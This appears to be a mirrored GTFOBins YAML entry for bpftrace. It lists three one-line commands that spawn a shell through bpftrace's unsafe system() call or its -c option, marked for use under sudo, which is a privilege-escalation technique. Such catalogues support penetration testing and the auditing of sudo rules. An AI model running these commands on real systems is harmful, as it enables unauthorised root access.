mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-07 19:54:12 +02:00
18 lines
370 B
Plaintext
18 lines
370 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
bpftrace --unsafe -e 'BEGIN {system("/bin/sh 1<&0");exit()}'
|
|
contexts:
|
|
sudo:
|
|
- code: |-
|
|
echo 'BEGIN {system("/bin/sh 1<&0");exit()}' >/path/to/temp-file
|
|
bpftrace --unsafe /path/to/temp-file
|
|
contexts:
|
|
sudo:
|
|
- code: |-
|
|
bpftrace -c /bin/sh -e 'END {exit()}'
|
|
contexts:
|
|
sudo:
|
|
...
|